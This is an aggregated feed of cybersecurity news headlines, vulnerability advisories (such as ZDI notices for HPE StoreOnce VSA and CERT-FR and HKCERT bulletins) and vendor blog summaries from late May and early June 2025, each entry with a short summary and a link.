RIA korraldab unikaalset küberkaitsealast elektritaristu koolitust
2025-06-02T06:46:51Z | 1748846811

Riigi Infosüsteemi Amet (RIA) viib koostöös NATO Küberkaitsekoostöö Keskuse (CCDCOE) ja CR14-ga läbi Eesti elektrivõrgu spetsialistide küberkaitsealast koolitamist.

https://ria.ee/uudised/ria-korraldab-unikaalset-kuberkaitsealast-elektritaristu-koolitust
MetaDefender ICAP Server v5.9.0: Speed Meets Security with File Type Filtering at the Edge
2025-06-02T06:00:00Z | 1748844000

Perimeter-Based File Type Verification, Simplified Troubleshooting, and Enhanced Monitoring for High-Performance Environments

https://www.opswat.com/blog/metadefender-icap-server-v5-9-0-speed-meets-security-with-file-type-filtering-at-the-edge
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
2025-06-02T05:51:00Z | 1748843460

Cybersecurity researchers have warned of a new spear-phishing campaign that uses a legitimate remote access tool called Netbird to target Chief Financial Officers (CFOs) and financial executives at banks, energy companies, insurers, and investment firms across Europe, Africa, Canada, the Middle East, and South Asia.  "In what appears to be a multi-stage phishing operation, the attackers...

https://thehackernews.com/2025/06/fake-recruiter-emails-target-cfos-using.html
ZDI-CAN-27154: Oracle
2025-06-02T05:00:00Z | 1748840400

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Do Manh Dung & Nguyen Dang Nguyen of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-06-02, 4 days ago. The vendor is given until 2025-09-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-312: Hewlett Packard Enterprise StoreOnce VSA setLocateBeaconOnHardware Command Injection Remote Code Execution Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-37089.

http://www.zerodayinitiative.com/advisories/ZDI-25-312/
ZDI-25-313: Hewlett Packard Enterprise StoreOnce VSA determineInclusionAndExtract Server-Side Request Forgery Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows remote attackers to initiate arbitrary server-side requests on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-37090.

http://www.zerodayinitiative.com/advisories/ZDI-25-313/
ZDI-25-314: Hewlett Packard Enterprise StoreOnce VSA doExecute Command Injection Remote Code Execution Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-37091.

http://www.zerodayinitiative.com/advisories/ZDI-25-314/
ZDI-25-315: Hewlett Packard Enterprise StoreOnce VSA queryHardwareReportLocally Command Injection Remote Code Execution Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-37092.

http://www.zerodayinitiative.com/advisories/ZDI-25-315/
ZDI-25-316: Hewlett Packard Enterprise StoreOnce VSA Authentication Bypass Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows remote attackers to bypass authentication on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-37093.

http://www.zerodayinitiative.com/advisories/ZDI-25-316/
ZDI-25-317: Hewlett Packard Enterprise StoreOnce VSA deletePackages Directory Traversal Arbitrary File Deletion Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows remote attackers to delete arbitrary files on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2025-37094.

http://www.zerodayinitiative.com/advisories/ZDI-25-317/
ZDI-25-318: Hewlett Packard Enterprise StoreOnce VSA getServerPayload Directory Traversal Information Disclosure Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 4.9. The following CVEs are assigned: CVE-2025-37095.

http://www.zerodayinitiative.com/advisories/ZDI-25-318/
ZDI-25-319: Hewlett Packard Enterprise StoreOnce VSA getServerCertificate Command Injection Remote Code Execution Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-37096.

http://www.zerodayinitiative.com/advisories/ZDI-25-319/
ZDI-25-320: SolarWinds DameWare Mini Remote Control Service Incorrect Permissions Local Privilege Escalation Vulnerability
2025-06-02T05:00:00Z | 1748840400

This vulnerability allows local attackers to escalate privileges on affected installations of SolarWinds DameWare Mini Remote Control Service. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26396.

http://www.zerodayinitiative.com/advisories/ZDI-25-320/
Manufacturing Security: It’s All About the Details
2025-06-02T04:00:00Z | 1748836800

In such a large industry, manufacturing risks can come from threat actors as well as well-meaning employees who make a mistake.

https://www.securitymagazine.com/articles/101657-manufacturing-security-its-all-about-the-details
Ubuntu Linux Kernel Multiple Vulnerabilities
2025-06-02T03:00:00Z | 1748833200

Multiple vulnerabilities were identified in Ubuntu Linux Kernel. An attacker could exploit some of these vulnerabilities to trigger security restriction bypass, denial of service condition, elevation of privilege, remote code execution, sensitive information disclosure and data manipulation on the targeted system.   Note: ... Impact Denial of Service Elevation of Privilege Remote Code Execution Information Disclosure Data Manipulation Security Restriction Bypass System / Technologies affected Ubuntu 16.04 LTS Ubuntu 18.04 LTS Ubuntu 20.04 LTS Ubuntu 22.04 LTS Ubuntu 24.04 LTS Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://ubuntu.com/security/notices/LSN-0112-1 https://ubuntu.com/security/notices/USN-7510-8 https://ubuntu.com/security/notices/USN-7513-5 https://ubuntu.com/security/notices/USN-7516-7 https://ubuntu.com/security/notices/USN-7516-8 https://ubuntu.com/security/notices/USN-7516-9 https://ubuntu.com/security/notices/USN-7550-1 https://ubuntu.com/security/notices/USN-7550-2 https://ubuntu.com/security/notices/USN-7550-3

https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20250602
SUSE Linux Kernel Multiple Vulnerabilities
2025-06-02T03:00:00Z | 1748833200

Multiple vulnerabilities were identified in SUSE Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, sensitive information disclosure and security restriction bypass on the targeted system. Impact Denial of Service Information Disclosure Security Restriction Bypass System / Technologies affected SUSE Linux Micro 6.0 SUSE Linux Micro Extras 6.0 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://www.suse.com/support/update/announcement/2025/suse-su-202520339-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520340-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520341-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520342-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520343-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520344-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520349-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520350-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520351-1/

https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20250602
Debian Linux Kernel Multiple Vulnerabilities
2025-06-02T03:00:00Z | 1748833200

Multiple vulnerabilities were identified in Debian Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege and sensitive information disclosure on the targeted system. Impact Elevation of Privilege Information Disclosure Denial of Service System / Technologies affected Debian bulleye versions prior to 6.1.137-1~deb11u1 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://lists.debian.org/debian-lts-announce/2025/05/msg00045.html

https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20250602
Lumma infostealer takedown may have inflicted only a flesh wound as crew keeps pinching and selling data
2025-06-02T01:16:14Z | 1748826974

PLUS: Ransomware gang using tech support scam; Czechia accuses China of infrastructure attack; And more! Infosec In Brief  Despite last week’s FBI announcement that it helped to take down the crew behind the Lumma infostealer, the malware continues to operate.

https://go.theregister.com/feed/www.theregister.com/2025/06/02/security_news_roundup/
NVIDIA cuobjdump ELF Section Parsing Integer Overflow Vulnerability
2025-06-02T00:00:00Z | 1748822400

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151
Catdoc utilities OLE Document Parser File Allocation Table 32-bit integer overflow vulnerability
2025-06-02T00:00:00Z | 1748822400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2131
Catdoc utilities OLE Document DIFAT Parser integer underflow vulnerability
2025-06-02T00:00:00Z | 1748822400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2132
High-Logic FontCreator GSUB subtable Out-Of-Bounds Read Vulnerability
2025-06-02T00:00:00Z | 1748822400

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2157
Catdoc xls2csv utility Shared String Table Record Parser memory corruption vulnerability
2025-06-02T00:00:00Z | 1748822400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2128
Vulnérabilité dans les produits Moxa (02 juin 2025)
2025-06-02T00:00:00Z | 1748822400

Une vulnérabilité a été découverte dans les produits Moxa. Elle permet à un attaquant de provoquer un déni de service à distance.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0470/
Vulnérabilité dans Roundcube (02 juin 2025)
2025-06-02T00:00:00Z | 1748822400

Une vulnérabilité a été découverte dans Roundcube Roundcube Webmail. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0468/
Vulnérabilité dans les produits Synology (02 juin 2025)
2025-06-02T00:00:00Z | 1748822400

Une vulnérabilité a été découverte dans les produits Synology. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0469/
Bulletin d'actualité CERTFR-2025-ACT-023 (02 juin 2025)
2025-06-02T00:00:00Z | 1748822400

Ce bulletin d'actualité du CERT-FR revient sur les vulnérabilités significatives de la semaine passée pour souligner leurs criticités. Il ne remplace pas l'analyse de l'ensemble des avis et alertes publiés par le CERT-FR dans le cadre d'une analyse de risques pour prioriser l'application des...

https://www.cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-023/
Charting a New Era of Network Security: Vectra AI at the Forefront by Hitesh Sheth
2025-06-02T00:00:00Z | 1748822400

Vectra AI leads the Gartner® Magic Quadrant™ for NDR—ranked highest in Execution and Vision. Discover why security teams choose Vectra AI.

https://www.vectra.ai/blog/charting-a-new-era-of-network-security-vectra-ai-at-the-forefront
On Caring
2025-06-01T18:56:22Z | 1748804182

[ This is a lightly edited internal post we’ve made public.] Last week we had booths at DevConf Joburg, and DevConf Cape Town. They’re two ZA events run by the same crew with the same speakers, two days and 1400kms apart. The organisers set a bar in ZA for putting on polished and well-run events. Where the average event is in an old venue with limited food and chaotic organisation, DevConf is punctual, classy, and efficient. Francois & Victor (Jhb), and Leighton & Daniel (Cpt) joined me in the two events, and we spent the time demo’ing Canary, and talking about Thinkst. We don’t expect to make sales from DevConf; the audience isn’t security, and they almost universally aren’t buyers. Any sales we get are bonuses. The reason we sponsor is not because we’re spendthrifts either. Through the year we get requests to sponsor events, podcasts, publications, software, education, meetups, do co-branding, write (or accept) guest blog posts, and more. We usually decline. For DevConf, our participation stands on two legs: supporting a developer community, and introducing (and maintaining) a public presence for future hiring. We do that mainly through 1-on-1 conversations with folks who walk up to the booth and, typically, start […]

https://blog.thinkst.com/2025/06/on-caring.html
(Recording) Building, Sustaining, and Scaling Job Quality within CDFIs
2025-05-31T16:01:50Z | 1748707310

Building, Sustaining, and Scaling Job Quality within CDFIs is the second panel from this event. For highlights from this discussion, subscribe to EOP’s YouTube channel. Or subscribe to our podcast to listen on the go. The post (Recording) Building, Sustaining, and Scaling Job Quality within CDFIs appeared first on The Aspen Institute.

https://www.aspeninstitute.org/videos/recording-building-sustaining-and-scaling-job-quality-within-cdfis/
Ransomware kingpin “Stern” apparently IDed by German law enforcement
2025-05-31T13:32:08Z | 1748698328

BSA names Vi­ta­ly Ni­ko­lae­vich Kovalev is "Stern," the leader of Trickbot.

https://arstechnica.com/security/2025/05/german-police-say-theyve-identified-trickbot-ransomware-kingpin/
Mysterious leaker GangExposed outs Conti kingpins in massive ransomware data dump
2025-05-31T10:23:08Z | 1748686988

'It's a high-stakes intelligence war,' analyst explains exclusive  A mystery whistleblower calling himself GangExposed has exposed key figures behind the Conti and Trickbot ransomware crews, publishing a trove of internal files and naming names.

https://go.theregister.com/feed/www.theregister.com/2025/05/31/gangexposed_coni_ransomware_leaks/
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
2025-05-31T10:19:00Z | 1748686740

Two information disclosure flaws have been identified in apport and systemd-coredump, the core dump handlers in Ubuntu, Red Hat Enterprise Linux, and Fedora, according to the Qualys Threat Research Unit (TRU). Tracked as CVE-2025-5054 and CVE-2025-4598, both vulnerabilities are race condition bugs that could enable a local attacker to obtain access to access sensitive information. Tools like...

https://thehackernews.com/2025/05/new-linux-flaws-allow-password-hash.html
Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server: April 2025
2025-05-31T09:20:38Z | 1748683238

On April 16, 2025, a critical vulnerability in the Erlang/OTP SSH server was disclosed. This vulnerability could allow an unauthenticated, remote attacker to perform remote code execution (RCE) on an affected device. The vulnerability is due to a flaw in the handling of SSH messages during the authentication phase. For a description of this vulnerability, see the Erlang announcement. This advisory will be updated as additional information becomes available. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy Security Impact Rating: Critical CVE: CVE-2025-32433

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy
U.S. DoJ Seizes 4 Domains Supporting Cybercrime Crypting Services in Global Operation
2025-05-31T07:16:00Z | 1748675760

A multinational law enforcement operation has resulted in the takedown of an online cybercrime syndicate that offered services to threat actors to ensure that their malicious software stayed undetected from security software. To that effect, the U.S. Department of Justice (DoJ) said it seized four domains and their associated server facilitated the crypting service on May 27, 2025, in...

https://thehackernews.com/2025/05/us-doj-seizes-4-domains-supporting.html
China-Linked Hackers Exploit SAP and SQL Server Flaws in Attacks Across Asia and Brazil
2025-05-31T03:17:08Z | 1748661428

May 30, 2025Ravie LakshmananVulnerability / Threat Intelligence The China-linked threat actor behind the recent in-the-wild exploitation of a critical security flaw in SAP NetWeaver has been attributed to a broader set of attacks targeting organizations in Brazil, India, and Southeast Asia since 2023. “The threat actor mainly targets the SQL injection vulnerabilities discovered on web […]

https://thecyberpost.com/news/hackers/china-linked-hackers-exploit-sap-and-sql-server-flaws-in-attacks-across-asia-and-brazil/
'Earth Lamia' Exploits Known SQL, RCE Bugs Across Asia
2025-05-30T20:13:59Z | 1748636039

A "highly active" Chinese threat group is taking proverbial candy from babies, exploiting known bugs in exposed servers to steal data from organizations in sensitive sectors.

https://www.darkreading.com/threat-intelligence/earth-lamia-exploits-sql-rce-bugs-asia
Turning Turbulence into Triumph Ways to Empower Your Agents
2025-05-30T20:09:42Z | 1748635782

Join session leaders Daniel Ziv from Verint and Radu Cristea of Avaya, as they lead a discussion on how proven strategies and solutions can drive significantly improved outcomes. The post Turning Turbulence into Triumph Ways to Empower Your Agents appeared first on Verint.

https://www.verint.com/resources/turning-turbulence-into-triumph-ways-to-empower-your-agents/
ConnectWise customers get mysterious warning about 'sophisticated' nation-state hack
2025-05-30T19:01:49Z | 1748631709

Pen tester on ScreenConnect bug: This one ‘terrifies’ me ConnectWise has brought in the big guns to investigate a "sophisticated nation state actor" that broke into its IT environment and then breached some of its customers.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/connectwise_compromised_by_sophisticated_government/
FBI Warns of Filipino Tech Company Running Sprawling Crypto Scams
2025-05-30T18:44:02Z | 1748630642

The US Treasury said cryptocurrency investment schemes like the ones facilitated by Funnull Technology Inc. have cost Americans billions of dollars annually.

https://www.darkreading.com/threat-intelligence/fbi-warns-tech-company-crypto-scams
A Hacker May Have Deepfaked Trump’s Chief of Staff in a Phishing Campaign
2025-05-30T18:42:45Z | 1748630565

Plus: An Iranian man pleads guilty to a Baltimore ransomware attack, Russia’s nuclear blueprints get leaked, a Texas sheriff uses license plate readers to track a woman who got an abortion, and more.

https://www.wired.com/story/trump-chief-staff-susie-wiles-hacker-phishing-impersonation/
Feds arrest DoD techie, claim he dumped top secret files in park for foreign spies to find
2025-05-30T18:29:11Z | 1748629751

28-year-old alleged to have made multiple drops to folks who turned out to be undercover FBI agents A Defense Intelligence Agency (DIA) IT specialist is scheduled to appear in court today after being caught by the FBI trying to surreptitiously drop top secret information to a foreign government in a public park.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/feds_nab_dod_techie_dumping/
Pentagon heightens scrutiny on IT, management consulting contracts
2025-05-30T18:28:00Z | 1748629680

Defense Secretary Pete Hegseth's newest directive for the department zeroes in on providers of “system IT integration, implementation, or advisory services."

https://www.nextgov.com/acquisition/2025/05/pentagon-heightens-scrutiny-it-management-consulting-contracts/405705/
Intelligence agency employee arrested for trying to share classified info with foreign government
2025-05-30T18:05:00Z | 1748628300

Nathan Vilas Laatsch was allegedly disgruntled by the Trump administration and willing to share sensitive data with the foreign country. The FBI set up a dead drop operation to intercept the classified materials.

https://www.nextgov.com/people/2025/05/intelligence-agency-employee-arrested-trying-share-classified-info-foreign-government/405703/
US medical org pays $50M+ to settle case after crims raided data and threatened to swat cancer patients
2025-05-30T17:35:07Z | 1748626507

Cash splashed on damages, infrastructure improvements, and fraud monitoring A Seattle cancer facility has agreed to fork out around $52.5 million as part of a class action settlement linked to a Thanksgiving 2023 cyberattack where criminals directly threatened cancer patients with swat attacks.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/fred_hutch_cancer_center_commits/
U.S. Treasury Sanctions FUNNULL CDN, FBI Issues Advisory Warning Against Major Cyber Scam Facilitator
2025-05-30T17:00:55Z | 1748624455

The US Treasury Dept sanctioned and the FBI issued an advisory warning against Chinese-based FUNNULL CDN, labeling it a major distributor of online scams. The post U.S. Treasury Sanctions FUNNULL CDN, FBI Issues Advisory Warning Against Major Cyber Scam Facilitator appeared first on Silent Push.

https://www.silentpush.com/blog/funnull-sanctioned/
U.S. Treasury Sanctions FUNNULL CDN, FBI Issues Advisory Warning Against Major Cyber Scam Facilitator
2025-05-30T17:00:55Z | 1748624455

The US Treasury Dept sanctioned and the FBI issued an advisory warning against Chinese-based FUNNULL CDN, labeling it a major distributor of online scams. The post U.S. Treasury Sanctions FUNNULL CDN, FBI Issues Advisory Warning Against Major Cyber Scam Facilitator appeared first on Silent Push.

https://www.silentpush.com/blog/funnull-sanctioned/
Senators call on Trump admin to reinstate cyber review board for Salt Typhoon investigation
2025-05-30T16:50:30Z | 1748623830

Several Senate Democrats called on Homeland Security Secretary Kristi Noem to reestablish the Cyber Safety Review Board (CSRB) so it could continue looking into China-linked hacks.

https://therecord.media/senators-call-on-trump-admin-reinstate-csrb
Senators urge DHS to reinstate disbanded cyber review board
2025-05-30T16:43:00Z | 1748623380

The board — which was dismissed at the start of the Trump administration — has been viewed as a well-intentioned but imperfect tool for reviewing significant cybersecurity events.

https://www.nextgov.com/cybersecurity/2025/05/senators-urge-dhs-reinstate-disbanded-cyber-review-board/405700/
Meta – yep, Facebook Meta – is now a defense contractor
2025-05-30T16:32:11Z | 1748622731

Giving people the power to build community and bring the world closer together so we can shoot them Meta has partnered with Anduril Industries to build augmented and virtual reality devices for the military, eight years after it fired the defense firm's founder, Palmer Luckey.

https://go.theregister.com/feed/www.theregister.com/2025/05/30/meta_is_now_a_defense/
Eight things we learned from WhatsApp vs. NSO Group spyware lawsuit
2025-05-30T16:25:00Z | 1748622300

The landmark trial between WhatsApp and NSO Group unearthed several new revelations.

https://techcrunch.com/2025/05/30/eight-things-we-learned-from-whatsapp-vs-nso-group-spyware-lawsuit/
Chainalysis: OFAC Sanctions Funnull Technology Inc. for Supporting Pig Butchering Scams
2025-05-30T16:00:35Z | 1748620835

The post Chainalysis: OFAC Sanctions Funnull Technology Inc. for Supporting Pig Butchering Scams appeared first on Silent Push.

https://www.chainalysis.com/blog/ofac-sanctions-funnull-technology-pig-butchering-scams-may-2025/#new_tab
(Recording) How Small Businesses and CDFIs are Working Together to Advance Job Quality
2025-05-30T16:00:24Z | 1748620824

Driving Innovation in Small Business Lending (Examples of How Small Business and CDFIs are Working Together to Advance Job Quality). For highlights from this discussion, subscribe to EOP’s YouTube channel. Or subscribe to our podcast to listen on the go. The post (Recording) How Small Businesses and CDFIs are Working Together to Advance Job Quality appeared first on The Aspen Institute.

https://www.aspeninstitute.org/videos/recording-how-small-businesses-and-cdfis-are-working-together-to-advance-job-quality/
GitHub Universe 2025: Here’s what’s in store at this year’s developer wonderland
2025-05-30T16:00:00Z | 1748620800

Sharpen your skills, test out new tools, and connect with people who build like you. The post GitHub Universe 2025: Here’s what’s in store at this year’s developer wonderland appeared first on The GitHub Blog.

https://github.blog/news-insights/company-news/github-universe-2025-heres-whats-in-store-at-this-years-developer-wonderland/
Promoting Wellness Among Security Teams in the Midst of Crisis
2025-05-30T16:00:00Z | 1748620800

Danielle Weddepohl, Director of Public Safety and Emergency Management at George Brown College, discusses how to promote wellness among security teams.

https://www.securitymagazine.com/articles/101648-promoting-wellness-among-security-teams-in-the-midst-of-crisis
Tabletop to Real World: Turning Incident Response Exercises into Operational Readiness
2025-05-30T16:00:00Z | 1748620800

Tabletop exercises are just the start Running a tabletop or simulated incident is a critical step in building preparedness. It […]

https://www.guidepointsecurity.com/blog/tabletop-to-real-world/
TechCrunch: US government sanctions tech company involved in cyber scams
2025-05-30T15:58:51Z | 1748620731

The post TechCrunch: US government sanctions tech company involved in cyber scams appeared first on Silent Push.

https://techcrunch.com/2025/05/29/us-government-sanctions-tech-company-involved-in-cyber-scams/#new_tab
White House investigating how Trump’s chief of staff’s phone was hacked
2025-05-30T15:45:50Z | 1748619950

Hackers reportedly accessed Wiles' phone contacts, which were used to impersonate her.

https://techcrunch.com/2025/05/30/white-house-investigating-how-trumps-chief-of-staffs-phone-was-hacked/
US military IT specialist arrested for allegedly trying to leak secrets to foreign government
2025-05-30T15:39:16Z | 1748619556

A 28-year-old civilian IT worker at the Defense Intelligence Agency has been arrested in Northern Virginia on suspicion that he leaked secrets to a foreign government.

https://therecord.media/defense-intelligence-agency-it-specialist-suspected-leak-foreign-government
HPE security advisory (AV25-303)
2025-05-30T15:00:12Z | 1748617212

On May 30, 2025, HPE published a security advisory to address vulnerabilities in the following product: HPE OneView – versions prior to v10.00

https://cyber.gc.ca/en/alerts-advisories/hpe-security-advisory-av25-303
Vulnerabilities in applications preloaded on Ulefone and Krüger&Matz smartphones
2025-05-30T15:00:00Z | 1748617200

CERT Polska has received a report about 3 vulnerabilities (from CVE-2024-13915 to CVE-2024-13917) found in applications preloaded on Ulefone and Krüger&Matz smartphones.

https://cert.pl/en/posts/2025/05/CVE-2024-13915/
How is the role of the CISO evolving?
2025-05-30T14:53:29Z | 1748616809

This role now stands as a pivotal figure in organizational strategy and security posture

https://www.itpro.com/security/how-is-the-role-of-the-ciso-evolving
Microsoft Edge security advisory (AV25-302)
2025-05-30T14:49:55Z | 1748616595

https://cyber.gc.ca/en/alerts-advisories/microsoft-edge-security-advisory-av25-302
How AI agents are being deployed in the real world
2025-05-30T14:46:28Z | 1748616388

These intelligent systems, capable of independent decision-making and learning, are transforming how organisations detect, respond to, and manage security problems

https://www.itpro.com/technology/artificial-intelligence/how-ai-agents-are-being-deployed-in-the-real-world
ConnectWise security advisory (AV25-301)
2025-05-30T14:39:18Z | 1748615958

https://cyber.gc.ca/en/alerts-advisories/connectwise-security-advisory-av25-301
Modernize Your SSO Stack: Smarter Cloud Migration Starts Here
2025-05-30T14:30:00Z | 1748615400

Part 2 of 2: This step-by-step guide will make SSO easy–and more secure

https://www.security.com/product-insights/modernize-your-sso-stack-smarter-cloud-migration-starts-here
New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
2025-05-30T14:14:00Z | 1748614440

A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as...

https://thehackernews.com/2025/05/eddiestealer-malware-uses-clickfix.html
Why Investigation Is the SOC’s New Bottleneck, and How to Fix It
2025-05-30T14:06:53Z | 1748614013

At RSA Conference 2025, we surveyed more than 70 cybersecurity professionals, asking some critical questions about their threat detection and incident response (TDIR) process. These weren’t random attendees. Every respondent was a vetted practitioner actively involved in TDIR, working directly within incident response...

https://www.netscout.com/blog/why-investigation-socs-new-bottleneck-and-how-fix-it
Meta says it disrupted influence operations linked to China, Iran, Romania
2025-05-30T14:00:39Z | 1748613639

The latest report from Meta on social media influence operations tracked some low-impact campaigns to China, Iran and Romania.

https://therecord.media/meta-influence-operations-takedown-china-iran-romania
Vibe Coding Changed the Development Process
2025-05-30T14:00:00Z | 1748613600

AI tools shook up development. Now, product security must change too.

https://www.darkreading.com/application-security/vibe-coding-changed-development-process
Serviceaide Data Leak Impacts Nearly 500,000 Catholic Health Patients
2025-05-30T14:00:00Z | 1748613600

Security leaders discuss the Serviceaide data leak, which impacted around 500,000 Catholic Health patients.

https://www.securitymagazine.com/articles/101659-serviceaide-data-leak-impacts-nearly-500-000-catholic-health-patients
SSE Leader. Again. Why Netskope Keeps Hitting the Mark.
2025-05-30T14:00:00Z | 1748613600

Today we are thrilled to announce that Netskope has once again been named a Leader in the Gartner® Magic Quadrant™  for Security Service Edge (SSE). This is the fourth year in a row Netskope has been recognized as a Leader, and we have been recognized as a Leader every time since the inaugural 2022 Magic […] The post SSE Leader. Again. Why Netskope Keeps Hitting the Mark. appeared first on Netskope.

https://www.netskope.com/blog/sse-leader-again-why-netskope-keeps-hitting-the-mark
Tenable to Acquire AI Security Startup Apex
2025-05-30T13:41:24Z | 1748612484

Apex will enhance Tenable's AI Aware tool by mitigating the threats of AI applications and tools not governed by organizations, while enforcing existing security policies.

https://www.darkreading.com/cyber-risk/tenable-acquire-ai-security-apex
CISO Stature Rises, but Security Budgets Remain Tight
2025-05-30T13:30:00Z | 1748611800

The rate of compensation gains has slowed from the COVID years, and budgets remain largely static due to economic fears, but CISOs are increasingly gaining executive status and responsibilities.

https://www.darkreading.com/cybersecurity-operations/ciso-stature-rises-budgets-tight
Cops in Germany Claim They’ve ID’d the Mysterious Trickbot Ransomware Kingpin
2025-05-30T13:22:09Z | 1748611329

The elusive boss of the Trickbot and Conti cybercriminal groups has been known only as “Stern.” Now, German law enforcement has published his alleged identity—and it’s a familiar face.

https://www.wired.com/story/stern-trickbot-identified-germany-bka/
The Complete Guide to Firewall Policy Compliance: Ensuring Enterprise Security
2025-05-30T13:21:31Z | 1748611291

​Keeping your firewall policies compliant isn’t just about checking a box — it’s about keeping your internal network secure, your data protected, and your business running smoothly. Think of your...

https://www.firemon.com/blog/firewall-policy-compliance-guide/
Damascened Peacock: Russian hackers targeted UK Ministry of Defence
2025-05-30T13:14:01Z | 1748610841

The UK’s Ministry of Defence has revealed that it was the target of a sophisticated cyber attack that saw Russia-linked hackers pose as journalists. Read more in my article on the Hot for Security blog.

https://www.bitdefender.com/en-us/blog/hotforsecurity/damascened-peacock-russian-hackers-targeted-uk-ministry-of-defence
The Good, the Bad and the Ugly in Cybersecurity – Week 22
2025-05-30T13:00:23Z | 1748610023

Robbinhood operator pleads guilty, PumaBot hits IoT via SSH brute-force attacks, and DragonForce expands RMM exploits via an affiliate model.

https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-22-6/
Your KnowBe4 Fresh Content Updates from May 2025
2025-05-30T13:00:01Z | 1748610001

Check out the 25 new pieces of training content added in May, alongside the always fresh content update highlights, new features and events.

https://blog.knowbe4.com/knowbe4-content-updates-may-2025
The Akamai Innovation Tour: A Journey in Perspective and Partnership
2025-05-30T13:00:00Z | 1748610000

?What does innovation mean to you?? Read how one marketer answered that question after attending the 2025 Akamai Innovation Tour.

https://www.akamai.com/blog/partners/2025/may/akamai-innovation-tour-journey-perspective-partnership
The Evolution of Compliance and the Future of Cybersecurity
2025-05-30T13:00:00Z | 1748610000

